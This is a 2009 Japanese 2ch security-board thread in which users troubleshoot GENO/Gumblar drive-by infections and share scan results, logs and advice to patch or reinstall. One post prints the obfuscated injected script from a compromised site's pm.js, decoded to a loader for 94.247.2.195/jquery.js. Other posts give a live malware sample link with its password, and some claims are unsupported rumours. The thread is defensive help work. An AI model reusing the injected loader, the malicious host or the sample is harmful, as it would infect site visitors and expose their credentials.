自分でも探していますが、もし差し支えなければどこだか教えて下さい
マルチと言ってるわけではないので、その辺は誤解なきよう…
ただバスタがやたら
[マルウエア名称] C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1
で検知してると思ったから、同じかなあと思っただけで
さて、晒していいものなのか判らんが・・・・
ttp://ime.nu/www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher ここを見たところ
「Adware-MemWatcherはバックグラウンドで起動し、ユーザがInternet Explorerを開くのを待ちます。ユーザがInternet Explorerを開くと、広告を表示するウインドウを1つ以上表示します。 」
とあります。
つまりInternet Explorerを開いて問題なければ大丈夫ということでしょうか?
すいません。一生懸命探したのですがどこだか分かりませんでした。
内容は記述なさらいで構いません。せめてURLだけでも教えて下さい。
お願いします。
ttp://www.higaitaisaku.com/kakolog/cbbs.cgi?mode=al2&number=94846&rev=&no=19&KLOG=9 【注文0.1】Genoのサイトでウイルス感染…か?★2
ttp://tsushima.2ch.net/test/read.cgi/news/1238897231/
ニュー速板のリンク
ざっと読んできたけど、2000とXPに限定されてるとあったからVistaなら大丈夫だとありましたね。
XPだとやられちゃうのか…よし踏んで来るか!!
もしかして訂正された?
情報交換は本スレでしたほうが良いかもね。
AcrobatとFlash Playerの古いバージョン入れてIEのセキュを中以下にして再トライきぼんw
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?
OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?
誰でも良い、仮想PC持ってる人いたら検証してくれ!!
JavaScriptやActiveX無効にしてたのに、運悪く感染した人もいたそうで…
その人、俺と違って最低限WindowsのUpdateはしっかりとやってるだろうから、
この俺のパソコンよりセキュリティレベルは、比べ物にならないほど上だと思いますよ。
再トライきぼんwは戯言だけど…、
他人がどうのではなく、実験機XPのAcrobatとFlash Playerの有無と有の場合のVer、
ブラウザのセキュリティ設定も書きこんだ上で結果を発表しないと…ここはセキュ板だもん。
【Microsoft Update(MU)の状態】 有り
【使用セキュリティソフトとバージョン】 カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 スパイボット ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。
検知したものは「trojan-Downloader.JS.Agent.dwf」 URLは t t p : / / 94.247.2.195/jquery.js
経緯としては、研音(芸能事務所)のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
ttp://ime.nu/www.ken-on.co.jp/k-shop/2009/03/post_67.html K-shopのトップページにも同じバナーはあります。
Acrobatなし
Flashあり(最新版)
ブラウザIE(セキュリティ高)
アドオン無効
制限付きユーザー
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。
スキャン終わりました。検出なしです。
すいませんがそこと通信しているかどうか確かめる方法はありますか?
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。
94.247.2.195も踏んで来たけど、『Search the Web:』ってもしかしてCoolWebSearchなのか?
検出なし、了解です。
通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。
690のケースはカスペで検知(遮断)されている前提
コマンドプロンプトにて「netstat -an」を実行しました。
94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため(0時36分の出来事だったため)
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。
ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか?
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜?有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。
IE7 保護モード
これでだいたいの奴は踏んでも怖くない
「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず,
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染,システムが
利用不能に。Windows Update+ウイルス対策ソフトでは対策にならない例。」
どうして対策できなかったの?
>Windows Update
Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった
>ウイルス対策ソフト
ウイルス対策ソフトがまだ対応していないウイルスだった
avastをインスコ バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン 090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず
これで一応は GENOウィルス大丈夫ってことで良いのでしょうか????????
【使用OS】 「windows xp sp3」
【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】 「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「したつもり」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「あり」
【スキャンの結果】 「何も検出されず」」
これからMicrosoft Update試みてみます。
Vista+IE7で、保護モード使ってるな
GENOウイルス関連サイト踏んだの?
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか?
はい、SDカード欲しくて、色んなサイト物色してたもんで
思いっきりGENO本体見てましたorz....
何時見たのかが記憶にないので
色々不安になってしまいまして
検出されなけれ大丈夫ですよねぇ??
httpsって飾りですかね。
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。
いや、あなた質問する時にこう言いましたよね?
>【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。
MicrosoftUpdateできました?
firefoxで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか???
マジMicrosoft Updateが繋がりませんしたorz
なんかもう疲れたんでorz
当該PCは電源落として明日また挑戦してみます
UpdateはIEでやるべきじゃね?
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。
電源落す前に、HijackThisのログをどこかのうpろだへ“パス付きで”上げて貰えないでしょうか?
・Winコントロールパネル>管理ツール>サービス
>「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認(駆除後も確認必要)
・Winコントロールパネル>セキュリティセンターの「自動更新」も確認(駆除後も確認必要)
Genoのウイルスはコレ
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L
「a-squared Free 4.0」 をダウンロード
ttp://www.emsisoft.jp/jp/software/free/ >手動Updateする
>「ディープスキャン」を選択実行して検出を試みる、
(※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく)>a-squared Freeでそのまま駆除
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう
GENOなどのサイトでウイルス感染★6
GmL.exe 受理 2009.04.06 18:04:43 (CET)
ttp://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646 La.zip 受理 2009.04.06 18:32:46 (CET)
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44 パックされたDropper型、McAfeeやSymantecは対応済みらしい
俺、Avast入れてないし、自動更新だって無効に設定してますけど?
電源落すって言ってたけど、環境によってはブルスクになるってあったからな…
a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
ttps://www.storemcafee.jp/mcfs/catalog/campaign_products.php?campaign_id=55&osCsid=iffvt7a7r0h2le5115blm0ctsdtvm8j6 Avastと一時的な共存なら問題無いから(駆除後にマカフィーアンインストール)体験版使う方がいいかもね
検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねw
すんません詳しくありがとうございまする
色々慣れないもので・・・・
流れとしては
PCが重くなる→AVG(前から入ってたが自動UPDATE不能に)→たまたまGENOウイルスの存在を知る
怖くなってAVG削除→avastは対応してる?らしいのでインスコ→これも自動UPDATEできず・・・→手動での状態まで辿り着く
あれ?Microsoft Updateできないや・・・・・→また不安にorz
明日マカフィー入れてスキャンしてみます。
ありがとうございました。
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…
自動UPDATEできないのならアウトだと思う
【使用セキュリティソフトとバージョン】 「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「年明けで期限切れ」
スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか?
*ウイルス注意*
ttp://ime.nu/www1.axfc.net/uploader/H/so/74041 pass[2ch] おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found TR/Dropper.Gen
Avast
Found Win32:SdBot-gen44
CPsecure
Found Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい
【Microsoft Update(MU)の状態】 「SP4適用のみ」
【使用セキュリティソフトとバージョン】 「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」
GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります?
あと、もしかしてGENOを踏んでしまったとか?
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。
このまま様子見で大丈夫でしょうか
ttp://ime.nu/lapcie.com/index.php?page=AsukaTime ここのサイトのAsukaTime
Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね?
【Microsoft Update(MU)の状態】 「自動 下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86
【使用セキュリティソフトとバージョン】 「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「同上」
【ルータの有無】 「BBルータ有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_GENOME.BK popup[1].js」
geno騒ぎを聞いたのでチェックしたところ上記がでてきました。
ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
ttp://www.geno-web.jp/Goods/GB09001900 最終表示日時 2009/03/31
ウイルスに感染していますか? acrobatreadは8.1.2なので古いです。
よろしくお願いします。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00
>日本語でグレー
>新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知?
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…
念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード
↓
ttp://wiki.higaitaisaku.com/wiki.cgi?page=HijackThis+%A5%C0%A5%A6%A5%F3%A5%ED%A1%BC%A5%C9+%28+Trend+Micro+%29 >732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。
先に聞きますが、SP2かSP3は当ててますよね?
>最終表示日時 2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。
WinXP Pro SP3です
キャッシュのクリアとクッキーのクリアを行います。
念のため、いくつかのオンラインウィルススキャンをやってみます。
ありがとうございました。
検索してみました〜これでおkですかね?
ttp://ime.nu/www.virustotal.com/jp/analisis/66fdd1049d0606e8a08c277e48b77ca1 了解です。
>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので(もし分かってたとしても駆除は難しいと思う)、
リカバリをお奨めします。
わかりました〜
ありがとうございました〜
便利そうなものなので こちら(popup.js)もアップしました。
どうも誤検知っぽいですね。
ttp://ime.nu/www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。
パターンファイルは最新っぽいから
訂正し切れなかったものかと思われます。
AsukaTime.exe 動かしたが何も落ちてこない。ツマンネ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。モットツマンネ
ttp://www.threatexpert.com/report.aspx?md5=c534ea1d81c337959b39524c0d883c46 ttp://www.virustotal.com/jp/analisis/7d246f0103dc3111c70dc17bc9bf5322 アンパックしたら減った。パッカで検出してんじゃね?
そうだろうか?
もし、の結果が誤検出なら多過ぎだと思うんですがね…
パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。
AhnLab-V3 5.0.0.2 2009.04.07 Win32/MalPackedB.suspicious
Authentium 5.1.2.4 2009.04.07 W32/Heuristic-210!Eldorado
BitDefender 7.2 2009.04.07 Trojan.Peed.Gen
F-Prot 4.4.4.56 2009.04.07 W32/Heuristic-210!Eldorado
GData 19 2009.04.07 Trojan.Peed.Gen
Norman 6.00.06 2009.04.07 W32/Packed_RLPack.F
Panda 10.0.0.14 2009.04.06 Malicious Packer
Prevx1 V2 2009.04.07 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.07 Sus/ComPack-F
Sunbelt 3.2.1858.2 2009.04.06 Trojan.Win32.Packer.RLPack1.18.a (v)
Symantec 1.4.4.12 2009.04.07 Suspicious.MH690.A
VirusBuster 4.6.5.0 2009.04.06 Packed/RLPack
まぁ、心配なら使わないことだな。
ご丁寧にいろいろとありがとうございました。
パッカで検出をしていました
お手数おかけしてすいませんでした〜
ここもか?
www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
↓
<script src=//94.247.2.195/jquery.js></script>
【使用セキュリティソフトとバージョン】 「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました
当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか?
初めてお目にかかった サンキュー
ありがとうございます。
久しぶりにクリーンすっかな・・・
Adobe Reader 9 のバージョンは 9.0.0.332 でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) -
ttp://ime.nu/update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208654512154 O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな?
ぱっと見、怪しいのは無いけど
Adobe Reader 9.1.0.163
Jre 1.6.0_13
が最新だから入れとけ
ttp://ime.nu/www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50 ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか?
ttp://ime.nu/news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n 特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか?
ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。
office2007なら考えられないこともないそーですが
ご心配ならそのファイルのコピーを作って、
VirusTotalで検査してみてください
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。
>O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
(HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…)
>768
リカバリした直後なら、問題なし。
こんなカキコがあった。
>ただComboFixで自動処理するとアカウントにログイン出来なくなる
>(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。
あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止
『 キャッシュをクリア(サッ 』
(やったー!カッコイイ!!!)
>winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。
一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・(いまだにわからん)
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな?
と思ったんだがそれも違うんですよね?
>再起動時にブルスクになると書いてあったから
それ初めて知ったw
ブルスクはよくわららんですw
ブルスクはあくまでもニュー速スレの情報ですし
(ブルスクは環境に寄りけりと言ったところか…)
ログイン出来なくなった時はどんな状態になったんですか?
どうもありがとうございます。office2007です。
virus totalにも行ってみたところ結果は0/40(0.00%)とありました。
ただの残骸のようなので普通に削除しようかと思います。
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
壁紙だけ表示されて即ユーザー選択画面へ・・・
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ?
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。
ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。
情報提供にご協力願います。
GENOウイルス被害者の会
ttp://ime.nu/yy701.60.kg/genovirus/ サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね?
OCNからの定期メールで やってみな みたいなこと書いてあったんですが・・・
ゾンビ?
やらない方がいいんですか?
HDD内の全ファイル名をテキスト化して
つこうたで定評のあるIPAに送信する愉快なツールだぞ、あれは
まじっすか?
ここで聞いといてよかったです
ttp://tsushima.2ch.net/test/read.cgi/news/1239241638/
【Microsoft Update(MU)の状態】 「つながりません」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。
ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。
今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。(メールはプロバイダがブロックして送信されていないようです。)
対策をご存知の方がいらっしゃいましたら宜しくお願いします。
DDS
ttp://www.forospyware.com/sUBs/dds dds.scr(MS-DOS アプリケーション)をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません
ttp://i39.tinypic.com/slqvly.jpg ログ抽出走査が完了すると「DDS - How to post the logs(投稿時の注意点)」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル(F)→「名前を付けて保存(A)」でそれぞれのログを保存しておく。(*テキスト名は変更しない)
OTViewIt
ttp://oldtimer.geekstogo.com/OTViewIt.exe OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています
これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report (Massmail bot infection. ) として送信
ttp://pc11.2ch.net/test/read.cgi/sec/1239086455/9 の中段
リカバリしてください。
そっちのほうが手間掛からずに済みます。
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX(バイラックス)」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル(exeファイルやscrファイル)に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難
ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの?
メタモーフィック型なら無理な気がするけど
[ Report ]の提出が完了したら、オートラン設定を確認する
@・IPA 情報処理推進機構
●「外部記憶メディアのセキュリティ対策を再確認しよう!」 USB メモリの利用における対策
ttp://www.ipa.go.jp/security/txt/2008/12outline.html A・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど)
B「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
ttp://pc11.2ch.net/test/read.cgi/sec/1239086455/8
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE(デフォルトで日本語有り)に。
に感染しました
msと主なセキュリティサイトに繋がりません
★質問用テンプレ★
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。
アメリカ人でも使ってないからw
俺は使ったことないから分からないな・・
何使ってる?おすすめあったら教えて
l.cmd
コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ
